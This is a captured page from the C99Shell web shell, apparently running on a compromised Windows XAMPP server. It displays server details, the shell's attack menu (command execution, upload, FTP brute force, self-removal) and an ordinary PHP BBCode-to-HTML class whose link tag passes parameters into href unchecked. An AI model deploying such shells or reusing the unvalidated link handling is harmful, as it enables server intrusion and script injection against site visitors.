!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\Xcode\SPLIB\TextManipulation\   drwxrwxrwx
Free 7.26 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SitepointBBCode.php (3.84 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* @package SPLIB
* @version $Id: SitepointBBCode.php,v 1.1 2003/12/12 08:06:05 kevin Exp $
*/
/**
* SitePointBBCode loads custom BBCode tags for bbcode class
* Developed by Leif K-Brooks.
* @see http://www.phpclasses.org/browse.html/package/951.html
* @access public
* @package SPLIB
*/
class SitePointBBCode {
    
/**
    * Stores an instance of the bbcode class
    * @var bbcode
    * @access private
    */
    
var $bbcode;

    
/**
    * SitePointBBCode constructor
    * Loads the custom BBCode tags into the bbcode class
    * @access public
    */
    
function SitePointBBCode () {
        
$this->bbcode = new bbcode();
        
// Adds [b /] tag for bold text
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'b',
            
'HtmlBegin'=>'<span style="font-weight: bold;">',
            
'HtmlEnd'=>'</span>')
            );
        
// Adds [i /] tag for italic text
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'i',
            
'HtmlBegin'=>'<span style="font-style: italic;">',
            
'HtmlEnd'=>'</span>')
            );
        
// Adds [u /] tag for underlining text
        
$this->bbcode->add_tag(
            array(
'Name'=>'u',
            
'HtmlBegin'=>'<span style="text-decoration: underline;">',
            
'HtmlEnd'=>'</span>')
            );
        
// Adds [link /] tag to convert to <a href="" />
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'link',
            
'HasParam'=>true,
            
'HtmlBegin'=>'<a href="%%P%%">',
            
'HtmlEnd'=>'</a>')
            );
        
// Adds [color /] tag to control font color
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'color',
            
'HasParam'=>true,
            
'ParamRegex'=>'[A-Za-z0-9#]+',
            
'HtmlBegin'=>'<span style="color: %%P%%;">',
            
'HtmlEnd'=>'</span>',
            
'ParamRegexReplace'=>array('/^[A-Fa-f0-9]{6}$/'=>'#$0'))
            );
        
// Adds [email /] tag to convert to <a href="mailto:" />
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'email',
            
'HasParam'=>true,
            
'HtmlBegin'=>'<a href="mailto:%%P%%">',
            
'HtmlEnd'=>'</a>')
            );
        
// Adds [size /] tag to control font size
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'size',
            
'HasParam'=>true,
            
'HtmlBegin'=>'<span style="font-size: %%P%%pt;">',
            
'HtmlEnd'=>'</span>',
            
'ParamRegex'=>'[0-9]+')
            );
        
// Adds [bg /] tag to background color of text
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'bg',
            
'HasParam'=>true,
            
'HtmlBegin'=>'<span style="background: %%P%%;">',
            
'HtmlEnd'=>'</span>',
            
'ParamRegex'=>'[A-Za-z0-9#]+'));
        
// Adds [s /] tag for strikethrough effect
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'s',
            
'HtmlBegin'=>'<span style="text-decoration: line-through;">',
            
'HtmlEnd'=>'</span>')
            );
        
// Adds [align /] tag for text alignment
        
$this->bbcode->add_tag(
            array(
            
'Name'=>'align',
            
'HtmlBegin'=>'<div style="text-align: %%P%%">',
            
'HtmlEnd'=>'</div>',
            
'HasParam'=>true,
            
'ParamRegex'=>'(center|right|left)')
            );
        
// Adds [url /] tag to [link /] tag
        
$this->bbcode->add_alias('url','link');
    }
    
/**
    * Replaces bbcode with corresponding HTML using underlying
    * bbcode->parse_bbcode() method
    * @param string text to parse for BBCode
    * @return string parsed text
    * @access public
    */
    
function parse ($text) {
        return 
$this->bbcode->parse_bbcode($text);
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--